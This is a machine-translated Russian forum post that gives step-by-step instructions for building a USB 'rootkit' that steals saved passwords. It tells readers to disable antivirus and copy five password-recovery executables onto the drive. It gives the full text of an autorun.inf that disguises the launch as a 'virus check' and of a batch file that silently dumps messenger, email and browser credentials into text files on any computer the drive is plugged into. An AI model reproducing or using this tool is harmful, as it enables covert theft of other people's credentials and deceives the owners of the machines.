Разное Как взломать пароли с помощью USB-накопителя

Как взломать пароли с помощью USB-накопителя


ddtGOK1rC2WxkzU0-LiNvZsTgwFtPKvQ2OWllOmsIF1ivUz2i0A-cpLfZJ5etMTOnm5sSmTsltMPK6EcZEMNFlQN35s7a0yPYc_aS-cU3mybUqvVE59iV_CRtYhG5bRzWA


читать
[HIDEPL="5,5"]Как мы все знаем, Windows хранит большинство паролей, которые используются на ежедневной основе, включая пароли мгновенных сообщений, такие как MSN, Yahoo, AOL, Windows messenger и т. Д. Наряду с этим Windows также хранит пароли Outlook Express, SMTP, POP , Учетные записи FTP и автозаполнение паролей многих браузеров, таких как IE и Firefox.
Существует множество инструментов для восстановления этих перехватчиков из их сохраненных мест. Используя эти инструменты и USB-накопитель, вы можете создать свой собственный руткит, чтобы обманывать пароли с любого компьютера. Нам нужны следующие инструменты для создания руткита:
MessenPass : Восстанавливает пароли самых популярных программ Instant Messenger: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x / 2003, AOL Instant Messenger с Netscape 7, Trillian, Miranda и GAIM.
Mail PassView : восстанавливает пароли следующих почтовых программ: Outlook Express, Microsoft Outlook 2000 (только для учетных записей POP3 и SMTP), Microsoft Outlook 2002/2003 (учетные записи POP3, IMAP, HTTP и SMTP), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail бесплатно.
Mail PassView также может восстановить пароли учетных записей электронной почты в Интернете (HotMail, Yahoo !, Gmail), если вы используете связанные программы этих учетных записей.
IE Passview : IE PassView - небольшая утилита, которая показывает пароли, хранящиеся в браузере Internet Explorer. Он поддерживает новый Internet Explorer 7.0, а также более старые версии Internet Explorer, v4.0 - v6.0
Защищенное хранилище PassView : восстанавливает все пароли, хранящиеся в защищенном хранилище, включая пароли автозаполнения Internet Explorer, пароли защищенных паролем сайтов, пароли MSN Explorer и т. Д.
PasswordFox : PasswordFox - это небольшой инструмент для восстановления пароля, который позволяет вам просматривать имена пользователей и пароли, хранящиеся в браузере Mozilla Firefox. По умолчанию PasswordFox отображает пароли, хранящиеся в вашем текущем профиле, но вы можете легко выбрать для просмотра паролей любого другого профиля Firefox. Для каждой записи пароля отображается следующая информация: Индекс записи, веб-сайт, имя пользователя, пароль, поле имени пользователя и пароль.
Подготовка USB-накопителя для взлома пароля:
Ниже приведена пошаговая процедура создания инструментария для взлома пароля:
Вы должны временно отключить антивирус, прежде чем выполнять следующие шаги.
Загрузите все 5 инструментов, извлеките их и скопируйте только исполняемые файлы (файлы .exe) на свой USB-накопитель.
т.е.: скопируйте файлы - mspass.exe , mailpv.exe , iepv.exe , pspv.exe и passwordfox.exe на свой USB-накопитель.
Создайте новый блокнот и напишите в него следующий текст:
[autorun] open = launch.bat ACTION = выполнить проверку вирусов
сохраните Блокнот и переименуйте его из New Text Document.txt в autorun.inf . Теперь скопируйте в autorun.inf файл на USB-накопитель пера.
Создайте еще один блокнот и напишите на нем следующий текст:
start mspass.exe / stext mspass.txt start mailpv.exe / stext mailpv.txt start iepv.exe / stext iepv.txt start pspv.exe / stext pspv.txt start passwordfox.exe / stext passwordfox.txt
Сохраните блокнот и переименуйте его из New Text Document.txt на launch.bat. Скопируйте в launch.bat файл на USB - диск.
Теперь ваш руткит готов, и вы все настроены на обнюхивание паролей. Вы можете использовать этот накопитель для пера на любом компьютере, чтобы обнюхать сохраненные пароли. Просто выполните следующие действия:
Вставьте ручку-перо и всплывающее окно автоматического запуска. (Это потому, что мы создали автозапуск pen-drive).
Во всплывающем окне выберите первый вариант ( выполнить проверку вирусов ).
Теперь все инструменты восстановления пароля будут незаметно выполняться в фоновом режиме (этот процесс занимает несколько секунд). Пароли сохраняются в файлах .TXT .
Удалите ручку-накопитель, и вы увидите сохраненные пароли в файлах .TXT .
Этот взлом работает в Windows 2000, XP, Vista и 7.
ПРИМЕЧАНИЕ. Эта процедура восстанавливает только сохраненные пароли (если они есть) на компьютере.
[/HIDEPL]
 

Обратите внимание

Назад
Сверху